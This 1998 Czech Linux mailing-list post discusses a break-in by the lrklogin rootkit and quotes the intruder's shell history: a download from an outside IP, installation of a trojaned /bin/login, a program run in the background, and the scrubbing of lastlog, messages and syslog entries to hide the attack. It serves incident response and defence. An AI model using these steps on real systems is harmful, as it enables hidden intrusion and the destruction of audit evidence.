Hackersky utok - lrklogin
Lukas Horalek
lin na ester.economia.cz
Čtvrtek Listopad 5 23:42:53 CET 1998
On Thu, 5 Nov 1998, Ondrej Suchy wrote:
> > 5) Po procisteni, restartu a obnoveni puvodniho 'login' nejevi tcp.log jiz
> > zadne znamky pribyvani - zjevne byl ziven falesnym 'loginem'...
>
> nikoliv. byl ziven snifferem.
> musite vzit ten soubor, projit ho a varovat spravce vsech serveru ktere
> jsou zde uvedeny.
Spis dohledat, zda nekteri uzivatele nepatri mimo muj Linux. Servery v
tomto logu uvedeny nejsou...
> vystrel do tmy: mrknete se do souboru .bash_history v home adresari
> dotycneho uzivatele, pak na /.bash_history nebo na /root/.bash_history.
> ale pokud to nebyl naprosty amater, tak nic nenajdete.
Ano, to me mezitim take napadlo - a hle, on ten utok byl vazne docela
amatersky. Zde kratky vytah z /root/.bash_history, prvni radek je prvnim
radkem utoku, predchozi jsou moje...
...
pico /etc/passwd
mkdir /usr/local/.s
cd /usr/local/.s
ftp 194.255.254.147
ls
pico /etc/passwd
ls
gzip -d lrklogin.tar.gz
tar -xvf lrklogin.tar
cd lrklogin/login/
make
cp login -f /bin
cd ..
cd ..
ls
gcc l.c -o l
l &
./l &
ls -al
cd /var/log
ls
cat lastlog | grep telia
cat lastlog | grep telia -v >>new
mv new lastlog
cat messages | grep telia
cat messages | grep telia -v >>new
mv new messages
pico secure
cd /etc
ls -al
pico syslog.conf
ps -x
kilall -HUP inetd
ps -x
ps -x
ps -x
ps -x
ps -x >>X
more X
kill _HUP 85
kill -HUP 85
rm X
logout
logout
....
No, nejkratsi to neni. Ale je to cele...dalsi radky uz jsou opet moje...
> redhat 3.0 rikate? tak to se urcit neda. tam je silene mnozstvi "remote"
> i "local" der. tzv. Open System ;-)
Ano, vim, jsem poucen, a RH 5.2 tam bude tak rychle, jak jen to bude mozne
;-)
> zbytecne. na 99% se nejednalo o nej. lrklogin je balik z linux rootkitu.
> pochybuju, ze by se vas kolega - pokud se nezajima o bezpecnost nejak
> vic - dostal k tomuto programu. pobavit, zastrasit nebo varovat lze
> lepsimi zpusoby, nemyslite? zbytecne ho netrapte. netvrdim, ze to nemohl
> byt on, ale zpusob jakym je toto provedeno je naprosto bezny u vsech
> "externich" utoku.
Skutecne to nebyl on. Naopak, jeho vedlestojici linux, byl napaden
naprosto stejnym zpusobem - dokonce o 1/4 hodiny drive...
> shadow hesla jsou sice dobra proti lokalnim uzivatelum a proti
> jednoduchym diram typu /cgi-bin/phf, ale externi bezpecnost vam
> nezajisti, bylo by hrichem si nainstalovat shadow package a myslet si,
> ze jste v pohode.
I kdepak, neberu shadow jako vselek. Ale rozhodne je to (alespon nekdy a v
nekterych situacich) bezpecnejsi, nez mit hesla 'otevrena'...
Diky Vam i Vsem ostatnim za cenne rady...
S pozdravem
Lukas Horalek,
HN, Economia, a.s.
Další informace o konferenci Linux